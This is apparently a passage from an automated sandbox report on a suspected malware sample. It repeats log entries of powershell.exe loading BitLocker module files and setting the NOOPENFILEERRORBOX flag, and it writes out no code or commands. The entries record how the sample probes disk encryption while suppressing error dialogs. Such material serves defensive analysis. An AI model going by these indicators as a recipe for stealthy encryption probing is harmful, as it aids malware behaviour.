                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
